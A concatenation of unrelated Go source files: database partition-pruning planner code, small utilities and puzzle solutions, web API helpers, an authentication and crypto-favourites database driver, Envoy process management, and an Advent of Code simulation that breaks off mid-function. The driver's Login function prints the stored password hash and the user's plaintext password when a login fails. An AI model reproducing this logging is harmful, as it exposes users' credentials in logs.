for _, idxMergeHint := range ds.indexMergeHints {
unknownPartitions := checkTableHintsApplicableForPartition(idxMergeHint.partitions, partitionSet)
appendWarnForUnknownPartitions(ds.SCtx(), restore2IndexHint(HintIndexMerge, idxMergeHint), unknownPartitions)
}
unknownPartitions := checkTableHintsApplicableForPartition(ds.preferPartitions[preferTiKV], partitionSet)
unknownPartitions = append(unknownPartitions,
checkTableHintsApplicableForPartition(ds.preferPartitions[preferTiFlash], partitionSet)...)
appendWarnForUnknownPartitions(ds.SCtx(), HintReadFromStorage, unknownPartitions)
}
func (s *partitionProcessor) makeUnionAllChildren(ds *DataSource, pi *model.PartitionInfo, or partitionRangeOR, opt *logicalOptimizeOp) (LogicalPlan, error) {
children := make([]LogicalPlan, 0, len(pi.Definitions))
partitionNameSet := make(set.StringSet)
usedDefinition := make(map[int64]model.PartitionDefinition)
for _, r := range or {
for i := r.start; i < r.end; i++ {
// This is for `table partition (p0,p1)` syntax, only union the specified partition if has specified partitions.
if len(ds.partitionNames) != 0 {
if !s.findByName(ds.partitionNames, pi.Definitions[i].Name.L) {
continue
}
}
// Not a deep copy.
newDataSource := *ds
newDataSource.baseLogicalPlan = newBaseLogicalPlan(ds.SCtx(), plancodec.TypeTableScan, &newDataSource, ds.SelectBlockOffset())
newDataSource.schema = ds.schema.Clone()
newDataSource.Columns = make([]*model.ColumnInfo, len(ds.Columns))
copy(newDataSource.Columns, ds.Columns)
newDataSource.isPartition = true
newDataSource.physicalTableID = pi.Definitions[i].ID
// There are many expression nodes in the plan tree use the original datasource
// id as FromID. So we set the id of the newDataSource with the original one to
// avoid traversing the whole plan tree to update the references.
newDataSource.SetID(ds.ID())
err := s.resolveOptimizeHint(&newDataSource, pi.Definitions[i].Name)
partitionNameSet.Insert(pi.Definitions[i].Name.L)
if err != nil {
return nil, err
}
children = append(children, &newDataSource)
usedDefinition[pi.Definitions[i].ID] = pi.Definitions[i]
}
}
s.checkHintsApplicable(ds, partitionNameSet)
if len(children) == 0 {
// No result after table pruning.
tableDual := LogicalTableDual{RowCount: 0}.Init(ds.SCtx(), ds.SelectBlockOffset())
tableDual.schema = ds.Schema()
appendMakeUnionAllChildrenTranceStep(ds, usedDefinition, tableDual, children, opt)
return tableDual, nil
}
if len(children) == 1 {
// No need for the union all.
appendMakeUnionAllChildrenTranceStep(ds, usedDefinition, children[0], children, opt)
return children[0], nil
}
unionAll := LogicalPartitionUnionAll{}.Init(ds.SCtx(), ds.SelectBlockOffset())
unionAll.SetChildren(children...)
unionAll.SetSchema(ds.schema.Clone())
appendMakeUnionAllChildrenTranceStep(ds, usedDefinition, unionAll, children, opt)
return unionAll, nil
}
func (*partitionProcessor) pruneRangeColumnsPartition(ctx sessionctx.Context, conds []expression.Expression, pi *model.PartitionInfo, pe *tables.PartitionExpr, columns []*expression.Column) (partitionRangeOR, error) {
result := fullRange(len(pi.Definitions))
if len(pi.Columns) < 1 {
return result, nil
}
pruner, err := makeRangeColumnPruner(columns, pi, pe.ForRangeColumnsPruning, pe.ColumnOffset)
if err == nil {
result = partitionRangeForCNFExpr(ctx, conds, pruner, result)
}
return result, nil
}
var _ partitionRangePruner = &rangeColumnsPruner{}
// rangeColumnsPruner is used by 'partition by range columns'.
type rangeColumnsPruner struct {
lessThan [][]*expression.Expression
partCols []*expression.Column
}
func makeRangeColumnPruner(columns []*expression.Column, pi *model.PartitionInfo, from *tables.ForRangeColumnsPruning, offsets []int) (*rangeColumnsPruner, error) {
if len(pi.Definitions) != len(from.LessThan) {
return nil, errors.Trace(fmt.Errorf("internal error len(pi.Definitions) != len(from.LessThan) %d != %d", len(pi.Definitions), len(from.LessThan)))
}
schema := expression.NewSchema(columns...)
partCols := make([]*expression.Column, len(offsets))
for i, offset := range offsets {
partCols[i] = schema.Columns[offset]
}
lessThan := make([][]*expression.Expression, 0, len(from.LessThan))
for i := range from.LessThan {
colVals := make([]*expression.Expression, 0, len(from.LessThan[i]))
for j := range from.LessThan[i] {
if from.LessThan[i][j] != nil {
tmp := (*from.LessThan[i][j]).Clone()
colVals = append(colVals, &tmp)
} else {
colVals = append(colVals, nil)
}
}
lessThan = append(lessThan, colVals)
}
return &rangeColumnsPruner{lessThan, partCols}, nil
}
func (p *rangeColumnsPruner) fullRange() partitionRangeOR {
return fullRange(len(p.lessThan))
}
func (p *rangeColumnsPruner) getPartCol(colID int64) *expression.Column {
for i := range p.partCols {
if colID == p.partCols[i].ID {
return p.partCols[i]
}
}
return nil
}
func (p *rangeColumnsPruner) partitionRangeForExpr(sctx sessionctx.Context, expr expression.Expression) (start int, end int, ok bool) {
op, ok := expr.(*expression.ScalarFunction)
if !ok {
return 0, len(p.lessThan), false
}
switch op.FuncName.L {
case ast.EQ, ast.LT, ast.GT, ast.LE, ast.GE:
case ast.IsNull:
// isnull(col)
if arg0, ok := op.GetArgs()[0].(*expression.Column); ok && len(p.partCols) == 1 && arg0.ID == p.partCols[0].ID {
// Single column RANGE COLUMNS, NULL sorts before all other values: match first partition
return 0, 1, true
}
return 0, len(p.lessThan), false
default:
return 0, len(p.lessThan), false
}
opName := op.FuncName.L
var col *expression.Column
var con *expression.Constant
var argCol0, argCol1 *expression.Column
var argCon0, argCon1 *expression.Constant
var okCol0, okCol1, okCon0, okCon1 bool
argCol0, okCol0 = op.GetArgs()[0].(*expression.Column)
argCol1, okCol1 = op.GetArgs()[1].(*expression.Column)
argCon0, okCon0 = op.GetArgs()[0].(*expression.Constant)
argCon1, okCon1 = op.GetArgs()[1].(*expression.Constant)
if okCol0 && okCon1 {
col, con = argCol0, argCon1
} else if okCol1 && okCon0 {
col, con = argCol1, argCon0
opName = opposite(opName)
} else {
return 0, len(p.lessThan), false
}
partCol := p.getPartCol(col.ID)
if partCol == nil {
return 0, len(p.lessThan), false
}
// If different collation, we can only prune if:
// - expression is binary collation (can only be found in one partition)
// - EQ operator, consider values 'a','b','ä' where 'ä' would be in the same partition as 'a' if general_ci, but is binary after 'b'
// otherwise return all partitions / no pruning
_, exprColl := expr.CharsetAndCollation()
colColl := partCol.RetType.GetCollate()
if exprColl != colColl && (opName != ast.EQ || !collate.IsBinCollation(exprColl)) {
return 0, len(p.lessThan), true
}
start, end = p.pruneUseBinarySearch(sctx, opName, con)
return start, end, true
}
// pruneUseBinarySearch returns the start and end of which partitions will match.
// If no match (i.e. value > last partition) the start partition will be the number of partition, not the first partition!
func (p *rangeColumnsPruner) pruneUseBinarySearch(sctx sessionctx.Context, op string, data *expression.Constant) (start int, end int) {
var savedError error
var isNull bool
if len(p.partCols) > 1 {
// Only one constant in the input, this will never be called with
// multi-column RANGE COLUMNS :)
return 0, len(p.lessThan)
}
charSet, collation := p.partCols[0].RetType.GetCharset(), p.partCols[0].RetType.GetCollate()
compare := func(ith int, op string, v *expression.Constant) bool {
for i := range p.partCols {
if p.lessThan[ith][i] == nil { // MAXVALUE
return true
}
expr, err := expression.NewFunctionBase(sctx, op, types.NewFieldType(mysql.TypeLonglong), *p.lessThan[ith][i], v)
if err != nil {
savedError = err
return true
}
expr.SetCharsetAndCollation(charSet, collation)
var val int64
val, isNull, err = expr.EvalInt(sctx, chunk.Row{})
if err != nil {
savedError = err
return true
}
if val > 0 {
return true
}
}
return false
}
length := len(p.lessThan)
switch op {
case ast.EQ:
pos := sort.Search(length, func(i int) bool { return compare(i, ast.GT, data) })
start, end = pos, pos+1
case ast.LT:
pos := sort.Search(length, func(i int) bool { return compare(i, ast.GE, data) })
start, end = 0, pos+1
case ast.GE, ast.GT:
pos := sort.Search(length, func(i int) bool { return compare(i, ast.GT, data) })
start, end = pos, length
case ast.LE:
pos := sort.Search(length, func(i int) bool { return compare(i, ast.GT, data) })
start, end = 0, pos+1
default:
start, end = 0, length
}
// Something goes wrong, abort this pruning.
if savedError != nil || isNull {
return 0, len(p.lessThan)
}
if end > length {
end = length
}
return start, end
}
func appendMakeUnionAllChildrenTranceStep(origin *DataSource, usedMap map[int64]model.PartitionDefinition, plan LogicalPlan, children []LogicalPlan, opt *logicalOptimizeOp) {
if opt.tracer == nil {
return
}
if len(children) == 0 {
appendNoPartitionChildTraceStep(origin, plan, opt)
return
}
var action, reason func() string
used := make([]model.PartitionDefinition, 0, len(usedMap))
for _, def := range usedMap {
used = append(used, def)
}
slices.SortFunc(used, func(i, j model.PartitionDefinition) int {
return cmp.Compare(i.ID, j.ID)
})
if len(children) == 1 {
newDS := plan.(*DataSource)
newDS.SetID(origin.SCtx().GetSessionVars().AllocNewPlanID())
action = func() string {
return fmt.Sprintf("%v_%v becomes %s_%v", origin.TP(), origin.ID(), newDS.TP(), newDS.ID())
}
reason = func() string {
return fmt.Sprintf("%v_%v has one needed partition[%s] after pruning", origin.TP(), origin.ID(), used[0].Name)
}
} else {
action = func() string {
buffer := bytes.NewBufferString(fmt.Sprintf("%v_%v becomes %s_%v with children[",
origin.TP(), origin.ID(), plan.TP(), plan.ID()))
for i, child := range children {
if i > 0 {
buffer.WriteString(",")
}
newDS := child.(*DataSource)
newDS.SetID(origin.SCtx().GetSessionVars().AllocNewPlanID())
fmt.Fprintf(buffer, "%s_%v", child.TP(), newDS.ID())
}
buffer.WriteString("]")
return buffer.String()
}
reason = func() string {
buffer := bytes.NewBufferString(fmt.Sprintf("%v_%v has multiple needed partitions[",
origin.TP(), origin.ID()))
for i, u := range used {
if i > 0 {
buffer.WriteString(",")
}
buffer.WriteString(u.Name.String())
}
buffer.WriteString("] after pruning")
return buffer.String()
}
}
opt.appendStepToCurrent(origin.ID(), origin.TP(), reason, action)
}
func appendNoPartitionChildTraceStep(ds *DataSource, dual LogicalPlan, opt *logicalOptimizeOp) {
action := func() string {
return fmt.Sprintf("%v_%v becomes %v_%v", ds.TP(), ds.ID(), dual.TP(), dual.ID())
}
reason := func() string {
return fmt.Sprintf("%v_%v doesn't have needed partition table after pruning", ds.TP(), ds.ID())
}
opt.appendStepToCurrent(dual.ID(), dual.TP(), reason, action)
}
|
package main
import (
"encoding/csv"
"fmt"
"io"
"os"
)
func main() {
// Open unprocessed csv file
infile, err := os.Open("unprocessed_data.csv")
if err != nil {
panic(err)
}
defer infile.Close()
// Create reader for unprocessed csv file
reader := csv.NewReader(infile)
// Create new csv for parsed data
outfile, err := os.Create("processed.csv")
if err != nil {
panic(err)
}
defer outfile.Close()
// Create writer for new csv
writer := csv.NewWriter(outfile)
defer writer.Flush()
var lineCount int
var skipCount int = 2
for {
// Read current row of unprocessed csv
row, err := reader.Read()
if err == io.EOF {
break
} else if err != nil {
panic(err)
}
// Skip first four header rows
if skipCount > 0 {
skipCount--
continue
}
// Check if connection was selected for article
if row[6] == "yes" {
// Write relevant values to csv
pair := make([]string, 2)
pair[0] = row[0] + "_" + row[1]
pair[1] = row[2] + "_" + row[3]
writer.Write(pair)
lineCount++
}
}
fmt.Println(lineCount, "lines were written to processed.csv")
}
|
package main
import (
"strings"
"fmt"
)
func simplifyPath(path string) string {
str := strings.Split(path, "/")
res := make([]string, 0) // spilt path without /
for _,v := range str {
if v != "" {
res = append(res, v)
}
}
size := len(res)
stack := make([]string,size)
top := 0
for i:=0;i<size;i++{
v := res[i]
if v != "." && v != ".."{
stack[top] = v
top++
}
if v == "."{
continue
}
if v == ".."{
if top >0{
top--
}
}
}
if top <= 0{
return "/"
}
s := ""
for i:= 0;i<top;i++{ //traverse the stack to return final path
s += "/"+stack[i]
}
return s
}
func main() {
res := simplifyPath("/a/../../b/../c//.//")
fmt.Println(res)
}
|
// time: O(n), space: O(1)
func myPow(x float64, n int) float64 {
return sol2(x, n)
}
// time: O(log(n)), space: O(1)
func sol2(x float64, n int) float64 {
if n == 0 {
return 1
}
nn := n
if n < 0 {
nn = -n
}
res := p(x, nn)
if n < 0 {
return 1/res
}
return res
}
func p(x float64, n int) float64 {
if n == 1 {
return x
}
res := p(x, n/2)
if n % 2 == 0 {
return res * res
}
return res * res * x
}
// time: O(n), space: O(1)
func sol1(x float64, n int) float64 {
if x == 1 || x == 0 || (x == -1 && n % 2 == 1) || (x == -1 && n % 2 == -1) {
return x
}
if x == -1 {
return -x
}
res := 1.000
if n < 0 {
x = 1/x
n = -n
}
for i := 0; i < n; i++ {
res *= x
}
return res
}
|
package controllers
import "github.com/w2hhda/candy/models"
var (
successReturn = &models.Response{0, "success", new(interface{})}
errParams = &models.Response{10001, "输入的参数不正确", new(interface{})}
errDB = &models.Response{10002, "数据库错误", new(interface{})}
errParse = &models.Response{10003, "数据解析失败", new(interface{})}
)
func (base *BaseController) RetError(e *models.Response) {
base.Ctx.Output.Header("Content-Type", "application/json; charset=utf-8")
base.Data["json"] = e
base.ServeJSON()
base.StopRun()
}
func (base *BaseController) RetSuccess(data interface{}) {
successReturn.Value = data
base.Data["json"] = successReturn
base.ServeJSON()
base.StopRun()
}
func (base *BaseController) RetLayuiPage(count int64, data interface{}) {
response := models.LayuiPageResponse{
Code: 0, Msg: "success", Count: count, Data: data,
}
base.Data["json"] = response
base.ServeJSON()
base.StopRun()
}
|
package requests
type KeyStruct struct {
Key string `json:"key"`
}
type GetBookByISBN struct {
Publisher []string `json:"publishers"`
Title string `json:"title"`
NumberOfPages uint `json:"number_of_pages"`
PublishDate string `json:"publish_date"`
AuthorId []KeyStruct `json:"authors"`
WorkId []KeyStruct `json:"works"`
BookId string `json:"key"`
}
type GetGoogleBookByISBN struct {
Items []struct {
Id string `json:"id"`
VolumeInfo struct {
Title string `json:"title"`
Authors []string `json:"authors"`
Publisher string `json:"publisher"`
PublishedDate string `json:"publishedDate"`
Description string `json:"description"`
NumberOfPages uint `json:"pageCount"`
Language string `json:"language"`
ImageLinks struct {
Thumbnail string `json:"thumbnail"`
} `json:"imageLinks"`
} `json:"volumeInfo"`
} `json:"items"`
}
type GetBookByWorkId struct {
Description string `json:"description"`
Title string `json:"title"`
}
type CreateBook struct {
ISBN string `json:"isbn" form:"isbn"`
MinDeposit uint `json:"min_deposit" form:"min_deposit"`
Status bool `json:"status" form:"status"`
}
|
package todo
import (
"github.com/jinzhu/gorm"
"mingchuan.me/api"
)
// TodoService -
type TodoService struct {
*gorm.DB
Version uint16
}
// Todo - TODO model
type Todo struct {
ID int64 `gorm:"primary_key" json:"id"`
Content string `gorm:"type:text; not null" json:"content"`
}
// NewService -
func NewService(db *gorm.DB) *TodoService {
return &TodoService{
DB: db,
Version: 1,
}
}
// Init - init the service, including auto-migrate table, etc.
func (srv *TodoService) Init() error {
db := srv.DB
db = db.AutoMigrate(&Todo{})
return db.Error
}
// RegisterAPI -
func (srv *TodoService) RegisterAPI(api *api.API) {
ctrl := CreateController(api, srv)
ctrl.BindAllRoutes()
}
|
package main
import (
"database/sql"
"fmt"
"github.com/gofrs/uuid"
"golang.org/x/crypto/bcrypt"
)
//Login func retrives user ID from login input credentials
func (d *DBDriver) Login(email string, password string) (string, error) {
var data SignInCreds
err := d.Conn.Get(&data, `SELECT id, password_hash FROM users WHERE email=$1`, email)
if err != nil {
fmt.Println(err)
return "", InvalidEmailOrPassword
}
if err == sql.ErrNoRows {
fmt.Println("no rows here")
return "", EmptyRows
}
err = bcrypt.CompareHashAndPassword(data.PasswordHash, []byte(password))
if err != nil {
fmt.Println(err, data.PasswordHash, []byte(password))
return "", IncorrectPassword
}
return data.ID, nil
}
//Signup func validates and inserts user data to db
func (d *DBDriver) Signup(username string, email string, password string) error {
passwordHash, err := bcrypt.GenerateFromPassword([]byte(password), bcrypt.DefaultCost)
if err != nil {
return SignupError
}
//generates user ID
userId, err := uuid.NewV4()
if err != nil {
return SignupError
}
idstr := userId.String()
//generates verfication token
verificationToken, err := uuid.NewV4()
if err != nil {
return SignupError
}
vToken := verificationToken.String()
//generates reset password token
resetPasswordToken, err := uuid.NewV4()
if err != nil {
return SignupError
}
passToken := resetPasswordToken.String()
query := `INSERT INTO users (id, email, username, password_hash, verified, verification_token, reset_pass_token) VALUES (:ID, :Email, :Username, :PasswordHash, :Verification, :VerificationToken, :ResetPassToken)`
_, err = d.Conn.NamedExec(query, map[string]interface{}{
"ID": idstr,
"Email": email,
"Username": username,
"PasswordHash": passwordHash,
"Verification": false,
"VerificationToken": vToken,
"ResetPassToken": passToken,
})
if err != nil {
if IsUniqueConstraintError(err, UniqueConstraintUsername) {
fmt.Println("violate username uq")
return ViolateUNUsername
}
if IsUniqueConstraintError(err, UniqueConstraintEmail) {
fmt.Println("violate email uq")
return ViolateUNEmail
}
return SignupError
}
return nil
}
//GetVerifToken func retrieves user's verification token after signup
func (d *DBDriver) GetVerifToken(username string, email string) (string, error) {
var verifToken string
err := d.Conn.Get(&verifToken, `SELECT verification_token FROM users WHERE username=$1 AND email=$2`, username, email)
if err != nil {
return "", BadRequestError
}
return verifToken, nil
}
//AddProducts func adds all products retrieved from coinbase API intp db
func (d *DBDriver) AddProducts(products []Products) error {
var query string
var id string
for _, product := range products {
err := d.Conn.Get(&id, `SELECT id FROM products WHERE id=$1`, product.ID)
// fmt.Println("id: ", product.ID)
if err == sql.ErrNoRows {
query = `INSERT INTO products (id, base_currency, quote_currency, base_min_size, base_max_size, quote_increment, base_increment, display_name, min_market_funds, max_market_funds, margin_enabled, post_only, limit_only, cancel_only, status, status_message)
VALUES(:ID, :BaseCurrency, :QuoteCurrency, :BaseMinSize, :BaseMaxSize, :QuoteIncrement, :BaseIncrement, :DisplayName, :MinMarketFunds, :MaxMarketFunds, :MarginEnabled, :PostOnly, :LimitOnly, :CancelOnly, :Status, :StatusMessage)`
} else {
query = `UPDATE products SET id=:ID, base_currency=:BaseCurrency, quote_currency=:QuoteCurrency, base_min_size=:BaseMinSize, base_max_size=:BaseMaxSize, quote_increment=:QuoteIncrement, base_increment=:BaseIncrement, display_name=:DisplayName, min_market_funds=:MinMarketFunds, max_market_funds=:MaxMarketFunds, margin_enabled=:MarginEnabled, post_only=:PostOnly, limit_only=:LimitOnly, cancel_only=:CancelOnly, status=:Status, status_message=:StatusMessage
WHERE id=:ID`
}
_, err = d.Conn.NamedExec(query, map[string]interface{}{
"ID": product.ID,
"BaseCurrency": product.BaseCurrency,
"QuoteCurrency": product.QuoteCurrency,
"BaseMinSize": product.BaseMinSize,
"BaseMaxSize": product.BaseMaxSize,
"QuoteIncrement": product.QuoteIncrement,
"BaseIncrement": product.BaseIncrement,
"DisplayName": product.DisplayName,
"MinMarketFunds": product.MinMarketFunds,
"MaxMarketFunds": product.MaxMarketFunds,
"MarginEnabled": product.MarginEnabled,
"PostOnly": product.PostOnly,
"LimitOnly": product.LimitOnly,
"CancelOnly": product.CancelOnly,
"Status": product.Status,
"StatusMessage": product.StatusMessage,
})
if err != nil {
return BadRequestError
}
}
return nil
}
//get all products from db
func (d *DBDriver) GetProducts() ([]ProductsList, error) {
data := []ProductsList{}
err := d.Conn.Select(&data, `SELECT * FROM products`)
if err != nil {
return nil, DbQueryError
}
if err == sql.ErrNoRows {
fmt.Println("no products")
return nil, DbQueryError
}
return data, nil
}
//UpdateTicker func updates or inserts tickers into db
func (d *DBDriver) UpdateTicker(tickerData *TickerData) error {
var test string
var query string
err := d.Conn.Get(&test, `SELECT id FROM products_tickers WHERE id=$1`, tickerData.ID)
if err != nil {
query = `INSERT INTO products_tickers (id, price, size, time, bid, ask, volume) VALUES(:ID, :Price, :Size, :Time, :Bid, :Ask, :Volume)`
} else {
query = `UPDATE products_tickers SET price=:Price, size=:Size, time=:Time, bid=:Bid, ask=:Ask, volume=:Volume WHERE id=:ID`
}
_, err = d.Conn.NamedExec(query, map[string]interface{}{
"ID": tickerData.ID,
"Price": tickerData.Price,
"Size": tickerData.Size,
"Time": tickerData.Time,
"Bid": tickerData.Bid,
"Ask": tickerData.Ask,
"Volume": tickerData.Volume,
})
if err != nil {
return DbQueryError
}
return nil
}
//SelectedProduct func retrieves product details from db based on product_id
func (d *DBDriver) SelectedProduct(id string) (*TickerData, error) {
data := &TickerData{}
err := d.Conn.Get(data, `SELECT id,price,size,time,bid,ask,volume FROM products_tickers WHERE id = $1`, id)
if err != nil {
return nil, DbQueryError
}
if err == sql.ErrNoRows {
return nil, DbQueryError
}
return data, nil
}
//AddFav func adds product into user_favourites in db
func (d *DBDriver) AddFav(userId string, productID string) error {
favId, err := uuid.NewV4()
if err != nil {
return AddFavProductError
}
fav_id := favId.String()
query := `INSERT INTO users_favourites (fav_id, user_id, ticker_id) VALUES (:FavID, :UserID, :ProductID)`
_, err = d.Conn.NamedExec(query, map[string]interface{}{
"FavID": fav_id,
"UserID": userId,
"ProductID": productID,
})
if err != nil {
return AddFavProductError
}
return nil
}
//RemoveFav func removes product from users_favourites in db
func (d *DBDriver) RemoveFav(userId string, productID string) error {
query := ` UPDATE users_favourites
SET archived = true, archived_at = current_timestamp
WHERE user_id = :UserID
AND ticker_id = :TickerID`
_, err := d.Conn.NamedExec(query, map[string]interface{}{
"UserID": userId,
"TickerID": productID,
})
if err != nil {
return RemoveFavProductError
}
return nil
}
//CheckFav func checks whether product has been favourited by user in users_favourtites in db
func (d *DBDriver) CheckFav(userID string, productID string) (*[]FavProducts, error) {
var favID string
var isArchived bool
err := d.Conn.Get(&favID, `SELECT fav_id FROM users_favourites WHERE user_id=$1 AND ticker_id=$2`, userID, productID)
if err != nil {
if err == sql.ErrNoRows {
d.AddFav(userID, productID)
} else {
return nil, BadRequestError
}
}
err = d.Conn.Get(&isArchived, `SELECT archived FROM users_favourites WHERE user_id=$1 AND ticker_id=$2`, userID, productID)
if err != nil {
return nil, BadRequestError
} else if isArchived == true {
d.UnarchivedProduct(userID, productID)
} else {
err = d.RemoveFav(userID, productID)
if err != nil {
return nil, RemoveFavProductError
}
}
data, err := d.GetFavProducts(userID)
if err != nil {
fmt.Println(err)
return nil, DbQueryError
}
return data, nil
}
//UnarchivedProduct func unarchives products in users_favourites table in db
func (d *DBDriver) UnarchivedProduct(userID string, productID string) error {
query := ` UPDATE users_favourites
SET archived = false, archived_at = current_timestamp
WHERE user_id = :UserID
AND ticker_id = :TickerID`
_, err := d.Conn.NamedExec(query, map[string]interface{}{
"UserID": userID,
"TickerID": productID,
})
if err != nil {
return DbQueryError
}
return nil
}
//GetFavProducts func retrieves all user's favourite products in db
func (d *DBDriver) GetFavProducts(id string) (*[]FavProducts, error) {
data := &[]FavProducts{}
err := d.Conn.Select(data, `
SELECT p.id, p.price, p.size, p.time, p.bid, p.ask, p.volume
FROM users_favourites uf, products_tickers p
WHERE uf.ticker_id = p.id
AND uf.user_id=$1
AND uf.archived = false`, id)
if err == sql.ErrNoRows {
return nil, EmptyFavProductList
}
if err != nil {
return nil, DbQueryError
}
return data, nil
}
//VerifyUserAcc funs sets user's verification bool to true
func (d *DBDriver) VerifyUserAcc(veriToken string) error {
query := `UPDATE users SET verification = true WHERE verification_token = :VerificationToken`
_, err := d.Conn.NamedExec(query, map[string]interface{}{
"VerificationToken": veriToken,
})
if err != nil {
return UserVerificationError
}
return nil
}
//ResetPassword func resets user's password
func (d *DBDriver) ResetPassword(userID string, currentPw string, newPw string) error {
var pw []byte
err := d.Conn.Get(&pw, `SELECT password_hash FROM users WHERE id=$1`, userID)
if err != nil {
fmt.Println(err)
return DbQueryError
}
err = bcrypt.CompareHashAndPassword(pw, []byte(currentPw))
if err != nil {
fmt.Println(err)
return PasswordMatchingIssue
}
newPwHash, err := bcrypt.GenerateFromPassword([]byte(newPw), bcrypt.DefaultCost)
if err != nil {
fmt.Println("this error: ", err)
return ResetPasswordError
}
query := `UPDATE users SET password_hash = :NewPassword WHERE id = :UserID`
_, err = d.Conn.NamedExec(query, map[string]interface{}{
"NewPassword": newPwHash,
"UserID": userID,
})
if err != nil {
return ResetPasswordError
}
return nil
}
//GetResetPassToken func handles password reset on With Reset Password Token
func (d *DBDriver) GetResetPassToken(email string) (string, error) {
var token string
err := d.Conn.Get(&token, `SELECT reset_pass_token FROM users WHERE email=$1`, email)
if err != nil {
if err == sql.ErrNoRows {
return "", RequestResetPassTokenError
}
return "", DbQueryError
}
return token, nil
}
//UpdatePassToken func resets Reset Password Token once user has reset password
func (d *DBDriver) UpdatePassWToken(resetPassToken string, password string) error {
var userID string
//gets user_id
err := d.Conn.Get(&userID, `SELECT id FROM users WHERE reset_pass_token=$1`, resetPassToken)
if err != nil {
if err == sql.ErrNoRows {
return DbQueryError
}
return BadRequestError
}
//hashes new password
newPwHash, err := bcrypt.GenerateFromPassword([]byte(password), bcrypt.DefaultCost)
if err != nil {
return ResetPasswordError
}
//generates new reset password token
newToken, err := uuid.NewV4()
if err != nil {
return ResetPasswordError
}
new_token := newToken.String()
//updates new password hash and new reset password token
query := `UPDATE users SET password_hash = :NewPassword, reset_pass_token = :NewToken WHERE id = :UserID`
_, err = d.Conn.NamedExec(query, map[string]interface{}{
"NewPassword": newPwHash,
"NewToken": new_token,
"UserID": userID,
})
if err != nil {
return ResetPasswordError
}
return nil
}
|
//go:build linux
// +build linux
package envoy
import (
"context"
"os"
"strconv"
"sync"
"syscall"
"time"
"go.opencensus.io/stats/view"
"github.com/pomerium/pomerium/internal/log"
"github.com/pomerium/pomerium/internal/telemetry/metrics"
)
const baseIDPath = "/tmp/pomerium-envoy-base-id"
var restartEpoch struct {
sync.Mutex
value int
}
var sysProcAttr = &syscall.SysProcAttr{
Setpgid: true,
Pdeathsig: syscall.SIGTERM,
}
func (srv *Server) runProcessCollector(ctx context.Context) {
pc := metrics.NewProcessCollector("envoy")
if err := view.Register(pc.Views()...); err != nil {
log.Error(ctx).Err(err).Msg("failed to register envoy process metric views")
}
defer view.Unregister(pc.Views()...)
const collectInterval = time.Second * 10
ticker := time.NewTicker(collectInterval)
defer ticker.Stop()
for {
select {
case <-ctx.Done():
return
case <-ticker.C:
}
var pid int
srv.mu.Lock()
if srv.cmd != nil && srv.cmd.Process != nil {
pid = srv.cmd.Process.Pid
}
srv.mu.Unlock()
if pid > 0 {
err := pc.Measure(ctx, pid)
if err != nil {
log.Error(ctx).Err(err).Msg("failed to measure envoy process metrics")
}
}
}
}
func (srv *Server) prepareRunEnvoyCommand(ctx context.Context, sharedArgs []string) (exePath string, args []string) {
// release the previous process so we can hot-reload
if srv.cmd != nil && srv.cmd.Process != nil {
log.Info(ctx).Msg("envoy: releasing envoy process for hot-reload")
err := srv.cmd.Process.Release()
if err != nil {
log.Warn(ctx).Err(err).Str("service", "envoy").Msg("envoy: failed to release envoy process for hot-reload")
}
}
args = make([]string, len(sharedArgs))
copy(args, sharedArgs)
restartEpoch.Lock()
if baseID, ok := readBaseID(); ok {
args = append(args,
"--base-id", strconv.Itoa(baseID),
"--restart-epoch", strconv.Itoa(restartEpoch.value),
"--drain-time-s", "60",
"--parent-shutdown-time-s", "120",
"--drain-strategy", "immediate",
)
restartEpoch.value++
} else {
args = append(args,
"--use-dynamic-base-id",
"--base-id-path", baseIDPath,
)
restartEpoch.value = 1
}
restartEpoch.Unlock()
return srv.envoyPath, args
}
func readBaseID() (int, bool) {
bs, err := os.ReadFile(baseIDPath)
if err != nil {
return 0, false
}
baseID, err := strconv.Atoi(string(bs))
if err != nil {
return 0, false
}
return baseID, true
}
|
package main
import (
"fmt"
"strings"
)
func loaddata2(input string, elfpower int) ([]unit, grid, int, int) {
grid := grid{}
units := []unit{}
x := 0
y := 0
maxx := 0
maxy := 0
for _, line := range strings.Split(input, "\n") {
line = strings.TrimSpace(line)
if line == "" {
continue
}
for _, r := range line {
grid[coord{x, y}] = r
if r == 'G' {
units = append(units, unit{goblin, default_hp, default_attackpower, coord{x, y}})
} else if r == 'E' {
units = append(units, unit{elf, default_hp, elfpower, coord{x, y}})
}
maxx = x
x++
}
maxy = y
y++
x = 0
}
return units, grid, maxx, maxy
}
func round2(units []unit, g grid, x int, y int) (bool, bool) {
//sort units by reading order (y, then x)
sortByReadingOrder(units)
//for each unit
for i := range units {
u := units[i]
if u.hitpoints <= 0 {
continue
}
if warover(units) {
return true, false
}
//identify all targets (enemies)
enemies := []unit{}
for _, pe := range units {
//ignore dead enemies =)
if pe.side != u.side && pe.hitpoints > 0 {
enemies = append(enemies, pe)
}
}
//identify if unit is adjacent(u/d/l/r) of enemy
adjacentenemies := []unit{}
for _, e := range enemies {
if adjacent(u, e) {
adjacentenemies = append(adjacentenemies, e)
}
}
if len(adjacentenemies) == 0 {
// for each enemy unit, identify adjacent(u/d/l/r) empty (.) squares
targetcoords := []coord{}
for _, ae := range enemies {
targetcoords = append(targetcoords, clearNeighbours(ae.xy, g)...)
}
// if no empty squares beside enemies, end turn
if len(targetcoords) == 0 {
continue
}
// for each empty square
// determine path length
closest, distance := findClosest(g, u.xy, targetcoords)
// if all squares are unreachable, end turn
if len(closest) == 0 {
continue
}
sortCoordsByReadingOrder(closest)
chosen := []coord{closest[0]}
for _, c := range clearNeighbours(u.xy, g) {
_, d := findClosest(g, c, chosen)
if d == distance-1 {
g[u.xy] = '.'
units[i].xy = c
if u.side == elf {
g[c] = 'E'
} else {
g[c] = 'G'
}
break
}
}
//update adjacent enemies after move.
for _, e := range enemies {
if adjacent(units[i], e) {
adjacentenemies = append(adjacentenemies, e)
}
}
}
//after move phase, attack
if len(adjacentenemies) == 0 {
//if no adjacent enemies, end turn.
continue
}
//select weakest enemy
chosen := selectWeakestEnemy(adjacentenemies)
for ce := range units {
//ideally we'd do chosen.hitpoints here, but
//chosen appears to be a copy, not the item in the array
//so go find the matching entry in the array.
//it MUST have the same coords, but ignore already dead
//units because they may have same coords as live ones!
if units[ce].xy == chosen.xy && units[ce].hitpoints > 0 {
units[ce].hitpoints -= u.attackpower
if units[ce].hitpoints <= 0 {
g[chosen.xy] = '.'
if units[ce].side == elf {
return false, true
}
}
break
}
}
}
return false, false
}
func part2(units []unit, g grid, x int, y int) bool {
var currentround int
for currentround = 1; !warover(units); currentround++ {
partialround, elfdied := round2(units, g, x, y)
if elfdied {
return false
}
if partialround {
